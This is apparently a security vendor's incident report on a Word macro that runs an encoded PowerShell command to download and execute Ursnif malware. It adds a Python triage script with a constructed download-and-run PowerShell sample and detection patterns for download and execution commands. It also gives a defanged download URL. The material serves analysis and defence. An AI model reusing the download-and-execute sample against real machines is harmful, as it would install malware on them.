Perception Point’s platform recently caught an advanced threat directed at one of our customers within a Microsoft Word file. Our Incident Analysis report below provides a detailed understanding of the attack and the damage it could have caused.
Key observations regarding this attack:
One of our customers received an email that had been flagged as “malicious” by Perception Point’s platform. This report includes a “what-if” analysis that examines the potential effect of the attack had the malicious file not been blocked.
Perception Point’s engines identified the malicious activity by tracing the macro commands. We noticed the following anomalies: the macro is obfuscated, and the code is far longer than any legitimate macro would need to be.
Figure: the command lines as extracted by Perception Point’s platform.
1. Researching the Word .doc file in a contained environment shows that the macro runs an encrypted PowerShell command.
2. The PowerShell command is base64 encoded.
3. Once the first layer is decoded, the resulting payload is as follows:
4. For the purpose of this analysis, we removed the final command, “invoke-expression”, so that no actual malicious activity would take place, and then ran the command:
5. The PowerShell script downloads an .exe file from hxxp://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn, renames it with a random name, saves it in a temp folder, and then executes it.
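As an added example (not part of the original report), the triage of steps 2 to 4 written as a Python script: it decodes a base64/UTF-16LE -EncodedCommand argument, replaces the commands that would execute the payload so the decoded script can be read safely, and flags the download, temp-folder drop, random-rename and execute behaviour described in step 5. The command line, URL and paths it runs on are constructed samples, not the ones from the incident.

```python
import base64
import re

# Constructed sample of the command-line shape described above: powershell.exe with
# a base64 (UTF-16LE) -EncodedCommand argument. The URL and paths are placeholders.
SAMPLE_SCRIPT = (
    "$u='http://example.invalid/stage.php?l=x';"
    "$p=$env:TEMP+'\\'+[guid]::NewGuid()+'.exe';"
    "(New-Object Net.WebClient).DownloadFile($u,$p);"
    "Start-Process $p;Invoke-Expression $r"
)
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -EncodedCommand "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii"))

# -e / -enc / -EncodedCommand followed by the base64 blob
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behaviours from step 5: fetch a file, drop it in %TEMP%, give it a random name, run it
INDICATORS = {
    "download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest", re.I),
    "temp_drop": re.compile(r"\$env:TEMP|GetTempPath", re.I),
    "random_name": re.compile(r"Get-Random|NewGuid", re.I),
    "execute": re.compile(r"Start-Process|Invoke-Expression|\bIEX\b", re.I),
}
SINKS = re.compile(r"Invoke-Expression|\bIEX\b|Start-Process", re.I)
URL = re.compile(r"https?://[^\s'\"()]+")

def decode_encoded_command(cmdline):
    """Return the decoded script, or None if no -EncodedCommand argument is present."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    # PowerShell expects the encoded command to be UTF-16LE, not UTF-8
    return base64.b64decode(m.group(1)).decode("utf-16le")

def neutralize(script):
    """Step 4: replace the commands that would run the payload, so the script can be inspected."""
    return SINKS.sub("<removed>", script)

def triage(cmdline):
    """Decode one command line and report the indicators and URLs found in it."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "hits": [], "urls": [], "safe_script": None}
    return {
        "encoded": True,
        "hits": [name for name, rx in INDICATORS.items() if rx.search(script)],
        "urls": URL.findall(script),
        "safe_script": neutralize(script),
    }
```

The decoded and neutralized script is what an analyst reads; the URL list is what goes into the blocklist and the sandbox lookup.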
TrojanSpy:Win32/Ursnif
TrojanSpy:Win32/Ursnif is a generic malware family with capabilities such as keylogging, data theft and command-and-control (C&C) communication.
This attack could have been very damaging for our customer, as it was well disguised and would have been very effective once released. Learn more about how our hardware-assisted platform is able to catch such attacks here.